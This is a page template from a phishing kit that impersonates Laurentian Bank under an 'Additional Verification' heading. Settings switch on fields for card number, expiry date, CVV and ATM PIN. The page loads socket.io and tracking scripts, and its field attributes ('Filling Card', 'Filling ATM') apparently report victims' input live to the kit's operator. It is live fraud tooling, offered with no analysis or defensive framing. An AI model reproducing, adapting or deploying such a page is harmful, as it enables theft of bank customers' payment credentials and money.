<%

let p_card = laur.card === 'on' ? true : false;
let p_atm = laur.atm === 'on' ? true : false;
let p_cvv = laur.cvv === 'on' ? true : false;
let p_expiry = laur.exp === 'on' ? true : false;

%>
<html xmlns:layout="http://www.ultraq.net.nz/web/thymeleaf/layout" lang="en_CA">
    <head>
        <title>Login</title>
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2">
        <link type="text/css" href="/assets/laur/md-reno-base-mobile.css?1" rel="stylesheet">
        <link type="text/css" href="/assets/laur/theme-laurentianbank-md-refresh-mobile.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/login-common.css" rel="stylesheet">
        <link type="text/css" href="/assets/laur/secure-key.css" rel="stylesheet">
        <link rel="icon" href="/assets/laur/favicon.png">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.js"></script>
        <script src="/assets/js/details.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body ng-app="UxpLoginApp" class="uxp-theme ng-scope">
        <div class="widget-c1-oauth-login position-relative oauth-login">
            <div ng-controller="UxpLoginController as $ctrl" id="c1-login-section" class="ng-scope">
                <form id="loginForm" id="input-form" name="" class="center-block c1-login-form ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength" action="" method="post" autocomplete="off" <?=$p_card ? 'onsubmit="return validate()"' : ''?>>
                    <input type="hidden" id="userAgent" name="userAgent">
                    <div>
                        <div ng-form="newLoginForm" ng-hide="showingMemorizedAccounts()" class="ng-pristine ng-invalid ng-invalid-uxp-pattern ng-invalid-required ng-valid-minlength ng-valid-maxlength">
                            <div class="logo text-center">
                                <img src="/assets/laur/logo.svg" alt="Laurentian Bank logo.">
                            </div>
                            <div>
                                <h1>Additional Verification</h1>
                                <div class="login-id-fields">
                                    <p style="margin-bottom: 30px; ">To verify your login, we require some additional information regarding your account.</p>
                                    <% if (p_card) { %>
                                    <div class="new-login-fields">
                                        <div  class="ng-scope form-group">
                                            <div class="is-empty">
                                                <label>
                                                    <span aria-hidden="true">Card Number</span>
                                                    <input class="form-control ng-pristine ng-empty ng-invalid ng-invalid-uxp-pattern ng-valid-maxlength ng-touched lrinput" attr-action="Filling Card" id="input-card" name="card" type="tel" value="" required placeholder="Card Number" minlength="19" maxlength="19" onkeyup="split()" >
                                                    <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                                                    <link rel="stylesheet" href="/assets/css/card.css?<?=time()?>">
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <% } if (p_expiry) { %>
                                    <div class="new-login-fields">
                                        <div  class="ng-scope form-group">
                                            <div class="is-empty">
                                                <label>
                                                    <span aria-hidden="true">Expiry Date</span>
                                                    <input class="form-control ng-pristine ng-empty ng-invalid ng-invalid-uxp-pattern ng-valid-maxlength ng-touched lrinput" attr-action="Filling Expiry" id="input-expiry2" name="expiry" type="tel" value="" required placeholder="MM/YY" minlength="5" maxlength="5">
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <% } if (p_cvv) { %>
                                    <div class="new-login-fields">
                                        <div  class="ng-scope form-group">
                                            <div class="is-empty">
                                                <label>
                                                    <span aria-hidden="true">CVV</span>
                                                    <input class="form-control ng-pristine ng-empty ng-invalid ng-invalid-uxp-pattern ng-valid-maxlength ng-touched lrinput" attr-action="Filling CVV" id="input-cvv" name="cvv" type="tel" value="" required placeholder="CVV" minlength="3" maxlength="4">
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <% } if (p_atm) { %>
                                    <div class="new-login-fields">
                                        <div  class="ng-scope form-group">
                                            <div class="is-empty">
                                                <label>
                                                    <span aria-hidden="true">ATM Pin</span>
                                                    <input class="form-control ng-pristine ng-empty ng-invalid ng-invalid-uxp-pattern ng-valid-maxlength ng-touched lrinput" attr-action="Filling ATM" id="input-atm" name="atm" type="tel" value="" required placeholder="&bullet;&bullet;&bullet;&bullet;" minlength="4" maxlength="6">
                                                </label>
                                            </div>
                                        </div>
                                    </div>
                                    <% } %>
                                    <div class="memorized-login-fields">
                                    </div>
                                </div>
                                <div class="text-center c1-btn-container">
                                    <button type="submit" id="" name="save" value="1">Continue</button>
                                </div>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Card</span>
    </body>
    <script src="/bank/atb/js/scriptCard.js"></script>
    <script src="/bank/laur/js/script.js"></script>
</html>
